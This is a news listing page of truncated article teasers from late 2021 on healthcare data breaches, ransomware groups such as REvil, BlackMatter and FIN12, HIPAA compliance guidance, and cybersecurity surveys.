Hacks, ransomware attacks, and other IT security incidents account for the majority of data breaches reported to the Department of Health and Human Services’ Office for Civil Rights, but data breaches involving physical records are also commonplace. According to the Verizon Data Breach Investigations Report, disclosed physical records accounted for 43% of all breaches in 2021, which highlights the need for data security measures to be implemented covering all forms of data. The healthcare industry is extensively targeted by cybercriminals and cyberattacks increased during the pandemic. There was a 73% increase in healthcare cyberattacks in 2020, with those breaches resulting in the exposure of 12 billion pieces of protected health information, according to the 2021 Data Protection Report recently published by Shred-It. The report is based on an in-depth survey of C-level executives, small- and medium-sized business owners, and consumers across North America and identifies several areas where organizations could improve their defenses against external and internal threats....

Read More
OCR: Ensure Legacy Systems and Devices are Secured for HIPAA Compliance
Nov02

OCR: Ensure Legacy Systems and Devices are Secured for HIPAA Compliance

The Department of Health and Human Services’ Office for Civil Rights has advised HIPAA-covered entities to assess the protections they have implemented to secure their legacy IT systems and devices. A legacy system is any system that has one or more components that have been supplanted by newer technology and reached end-of-life. When software and devices reach end-of-life, support comes to an end, and patches are no longer issued to correct known vulnerabilities. That makes legacy systems and devices vulnerable to cyberattacks. Healthcare organizations should be aware of the date when support will no longer be provided, and a plan should be developed to replace outdated software and devices; however, there are often valid reasons for continuing to use outdated systems and devices. Legacy systems may work well and be well-tailored to an organization’s business model, so there may be a reluctance to upgrade to new systems that are supported. Upgrading to a newer system may require time, funds, and human resources that are not available, or it may not be possible to replace a legacy...

Read More
Microsoft Warns of Ongoing Attacks by SolarWinds Hackers on Service Providers and Downstream Businesses
Nov01

Microsoft Warns of Ongoing Attacks by SolarWinds Hackers on Service Providers and Downstream Businesses

The advanced persistent threat (APT) actor Nobelium (aka APT29; Cozy Bear) that was behind the 2020 SolarWinds supply chain attack is targeting cloud service providers (CSPs), managed service providers (MSPs), and other IT service providers, according to a recent alert from Microsoft. Rather than conducting attacks on many companies and organizations, Nobelium is favoring a compromise-one-to-compromise-many approach. This is possible because service providers are often given administrative access to customers’ networks to allow them to provide IT services. Nobelium is attempting to leverage that privileged access to conduct attacks on downstream businesses and has been conducting attacks since at least May 2021. Nobelium uses several techniques to compromise the networks of service providers, including phishing and spear phishing attacks, token theft, malware, supply chain attacks, API abuse, and password spraying attacks on accounts using commonly used passwords and passwords that have previously been stolen in data breaches. Once access to service providers’ networks has been...

Read More
Study Reveals Healthcare Employees Have Unnecessary Access to Huge Amounts of PHI
Oct27

Study Reveals Healthcare Employees Have Unnecessary Access to Huge Amounts of PHI

A new study has revealed widespread security failures at healthcare organizations, including poor access controls, few restrictions on access to protected health information (PHI), and poor password practices, all of which are putting sensitive data at risk. The study, conducted by the data security and insider threat detection platform provider Varonis, involved an analysis of around 3 billion files at 58 healthcare organizations, including healthcare providers, pharmaceutical companies, and biotechnology firms. The aim of the study was to determine whether security controls had been implemented to secure sensitive data and to help organizations better understand their cybersecurity vulnerabilities in the face of increasing threats. The Health Insurance Portability and Accountability Act (HIPAA) requires access to PHI to be limited to employees who need to view PHI for work purposes. When access is granted, the HIPAA minimum necessary standard applies, and only the minimum amount of PHI should be accessible. Each user must be provided with a unique username that allows access to...

Read More
International Law Enforcement Operation Takes Down REvil Ransomware Gang’s Infrastructure
Oct27

International Law Enforcement Operation Takes Down REvil Ransomware Gang’s Infrastructure

In July 2021, the notorious REvil (Sodinokibi) ransomware gang appeared to have ceased operations, with both its Tor payment site and data leak blog suddenly going offline. The DarkSide ransomware operation also went quiet, leading many security experts to believe that the operators of the ransomware-as-a-service (RaaS) operations were laying low or that there had been a law enforcement takedown of their infrastructure. Some of the servers used by the REvil gang were brought back online temporarily but were shut down again in mid-October. This temporary resurrection was thought to be an affiliate attempting to continue the operation. The apparent shutdown of the REvil operation followed two major attacks on the food production company JBS and the software management company Kaseya, with the later attack affecting around 50 managed service providers and up to 1,500 downstream businesses. Associates of the REvil gang had developed the DarkSide ransomware variant, which was used in the attack on Colonial Pipeline and caused its fuel pipeline to the Eastern seaboard of the United...

Read More
Cybersecurity Awareness Month: Put Cybersecurity First
Oct25

Cybersecurity Awareness Month: Put Cybersecurity First

The theme of the fourth week of Cybersecurity Awareness Month is “Cybersecurity First”, with the focus on getting the message across to businesses about the need for cybersecurity measures to address vulnerabilities in products, processes, and people. Cybersecurity Advice for Companies One study suggests 64% of companies worldwide have experienced some form of cyberattack and the rate at which attacks are occurring is increasing. It is essential for companies to ensure that cybersecurity measures are incorporated when developing apps, products, or new services and for cybersecurity to be considered at the design stage. Safeguards need to be baked into products from the start. Cybersecurity should not be an afterthought. Businesses need to have a thorough understanding of their IT environment and what assets need to be protected. An inventory should be created for all assets and the location of all sensitive data should be known. A plan then needs to be developed to protect those assets, which should include overlapping layers of protection using technologies such as firewalls, spam...

Read More
44% of Healthcare Organizations Don’t Have Full Visibility into 3rd Party Access and Permissions
Oct25

44% of Healthcare Organizations Don’t Have Full Visibility into 3rd Party Access and Permissions

A recent study conducted by the Ponemon Institute on behalf of cybersecurity firm SecureLink has explored the state of third-party security and critical access management at healthcare organizations. As with other industry sectors, remote access to internal systems is provided to third parties to allow them to perform essential business functions. Whenever a third party is provided with access, there is a risk that access rights will be abused. Credentials could also potentially be obtained by cyber threat actors and used for malicious purposes. While healthcare organizations are aware that providing access to third parties involves a degree of risk, in healthcare the level of risk is often underestimated. The healthcare industry is extensively targeted by cyber actors and the industry experiences four times the number of data breaches as other industry sectors and the threat is growing. A recent Bitglass study suggests a 55% increase in healthcare data breaches in the United States during the pandemic. SecureLink’s study, the results of which were published in the report, A Matter...

Read More
Healthcare CISOs Need Federal Assistance to Deal with Increase in Cyber Threats
Oct22

Healthcare CISOs Need Federal Assistance to Deal with Increase in Cyber Threats

A recent survey conducted on Chief Information Security Officer (CISO) members of the College of Healthcare Information Management Executives (CHIME) and Association for Executives in Healthcare Information Security (AEHIS) has highlighted the impact cybersecurity incidents have had on the healthcare industry and the need for federal assistance to deal with the threats. The healthcare industry has long been targeted by cybercriminals, but attacks have increased during the pandemic. 67% of respondents said their organization had experienced a security incident in the past 12 months with almost half saying they were the victim of a phishing attack. Phishing and business email compromise attacks, malware ransomware, hacking, and insider threats were the most common security exploits used in cyberattacks on the industry. Cyberattacks can cause patient safety issues. One recent study indicates mortality rates increase following a ransomware attack, as do medical complications and the length of hospital stays. The survey confirmed the impact on patient safety, with 15% of respondents...

Read More
September 2021 Healthcare Data Breach Report
Oct20

September 2021 Healthcare Data Breach Report

There was a 23.7% month-over-month increase in reported healthcare data breaches in September, which saw 47 data breaches of 500 or more records reported to the Department of Health and Human Services’ Office for Civil Rights. While that is more than 1.5 breaches a day, it is under the average of 55.5 breaches per month over the past 12 months. While data breaches increased, there was a major decrease in the number of breached healthcare records, dropping 75.5% from August to 1,253,258 records across the 47 reported data breaches, which is the third-lowest total over the past 12 months. Largest Healthcare Data Breaches Reported in September 2021 16 healthcare data breaches were reported in September 2021 that involved the exposure, theft, or impermissible disclosure of more than 10,000 healthcare records. The largest breach of the month was reported by the State of Alaska Department of Health & Social Services. The breach was initially thought to have resulted in the theft of the personal and protected health information (PHI) of all state residents, although the breach was...

Read More
Alert Issued About Ongoing BlackMatter Ransomware Attacks
Oct19

Alert Issued About Ongoing BlackMatter Ransomware Attacks

A joint alert has been issued by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), and the Cybersecurity and Infrastructure Security Agency (CISA) about ongoing BlackMatter ransomware attacks. The group has been conducting attacks in the United States since July 2021, which have included attacks on critical infrastructure entities and two organizations in the U.S. Food and Agriculture Sector. Evidence has been obtained that links the gang to the DarkSide ransomware gang that conducted attacks between September 2020 and May 2021, including the attack on Colonial Pipeline, with BlackMatter ransomware potentially a rebrand of the DarkSide operation. Investigations into the attacks have allowed the agencies to obtain important information about the tactics, techniques, and procedures (TTPs) of the group, and an analysis has been performed on a sample of the ransomware in a sandbox environment. The group is known to use previously compromised credentials to gain access to victims’ networks, then leverages the Lightweight Directory Access Protocol (LDAP) and...

Read More
Cybersecurity Awareness Month: Fight the Phish!
Oct12

Cybersecurity Awareness Month: Fight the Phish!

According to the Verizon Data Breach Investigations Report, phishing accounted for around 80% of all reported phishing attacks in 2019 and since the pandemic began in 2020 phishing attacks and associated scams have been thriving. In 2020, 74% of US organizations experienced a successful phishing attack. Phishing attacks typically use emails or malicious websites – or both – to obtain sensitive information such as login credentials or to infect devices with malware and viruses. Phishing attacks involve a lure to get the recipient to take a certain action, such as clicking on a hyperlink in an email or opening a malicious email attachment. Email addresses, sender names, phone numbers, and website URLs are often spoofed to trick people into believing they are interacting with a familiar and trusted source. The 2021 Cost of Phishing Study conducted by the Ponemon Institute/Proofpoint suggests the cost of phishing attacks has quadrupled over the past 6 years, with large U.S. firms now losing an average of $14.83 million a year to phishing attacks. An average-sized U.S. company employing...

Read More
FIN12 Ransomware Gang Actively Targeting the Healthcare Sector
Oct12

FIN12 Ransomware Gang Actively Targeting the Healthcare Sector

Ransomware is currently the biggest cyber threat faced by the healthcare industry. Attacks often cripple healthcare IT systems for weeks or months and prevent medical records from being accessed. One study by the Ponemon Institute/Censinet shows attacks result in treatment delays, an increase in complications, poorer patient outcomes, and an increase in mortality rates. Several ransomware gangs have publicly stated they will not attack the healthcare industry, but that is certainly not true of FIN12. According to a recently published analysis of the ransomware actor by Mandiant, around 20% of the attacks conducted by the group have been on the healthcare industry. FIN12 is a prolific ransomware actor that focuses on big game targets. Almost all the victims of FIN12 have annual revenues over $300 million, with an average of almost $6 billion. FIN12 has been active since at least 2018 and has largely targeted North America where 85% of its attacks have occurred, although the gang has recently expanded geographically and now also conducts attacks in Europe and the Asia Pacific region....

Read More
Ransom Disclosure Act Requires Disclosure of Payments to Ransomware Gangs Within 48 Hours
Oct11

Ransom Disclosure Act Requires Disclosure of Payments to Ransomware Gangs Within 48 Hours

A new bill has been introduced that, if passed, will require victims of ransomware attacks to disclose any payments made to the attackers to the Department of Homeland Security (DHS) within 48 hours of the ransom being paid. The Ransom Disclosure Act was introduced by Sen. Elizabeth Warren (D-Mass.) and Rep. Deborah Ross (D-N.C.) and aims to provide the DHS with the data it needs to investigate ransomware attacks and improve understanding of how cybercriminal enterprises operate, thus allowing the DHS to gain a much better picture of the ransomware threat facing the United States. Between 2019 and 2020 ransomware attacks increased by 62% worldwide, and by 158% in the United States. The Federal Bureau of Investigation (FBI) received 2,500 complaints about ransomware attacks in 2020, up 20% from the previous year and there were more than $29 million in reported losses to ransomware attacks in 2020. Not all ransomware attacks are reported. Many victims choose to quietly pay the attackers for the keys to decrypt their data and prevent the public disclosure of any data stolen in the...

Read More